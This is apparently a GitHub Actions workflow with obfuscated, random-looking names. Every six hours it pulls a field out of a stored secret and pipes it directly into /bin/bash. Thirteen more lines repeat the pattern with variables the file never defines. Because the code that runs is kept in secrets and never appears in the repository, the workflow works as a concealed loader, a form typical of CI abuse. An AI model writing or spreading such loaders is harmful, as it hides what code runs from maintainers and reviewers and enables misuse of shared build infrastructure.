name: weixutong6745
on:
  workflow_dispatch:
  schedule:
    - cron: '45 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: weixutong6745
        env:
          sojzw38: ${{ secrets.sojzw38 }}
        run: |
          echo $sojzw38 | jq -r .d129 | /bin/bash
          echo $zgijf1992 | jq -r .ihbpd5 | /bin/bash
          echo $kr1640 | jq -r .onage3 | /bin/bash
          echo $iuj53375 | jq -r .hxdlj8 | /bin/bash
          echo $z9846 | jq -r .r447 | /bin/bash
          echo $n4 | jq -r .xv37 | /bin/bash
          echo $nhpos74 | jq -r .y862 | /bin/bash
          echo $xz88 | jq -r .geku86 | /bin/bash
          echo $t2235 | jq -r .e5594 | /bin/bash
          echo $rbao637 | jq -r .jh728 | /bin/bash
          echo $rup8 | jq -r .vpjf199 | /bin/bash
          echo $c908 | jq -r .qz196 | /bin/bash
          echo $qybd63 | jq -r .ppppa04 | /bin/bash
          echo $e32 | jq -r .vtknn2 | /bin/bash

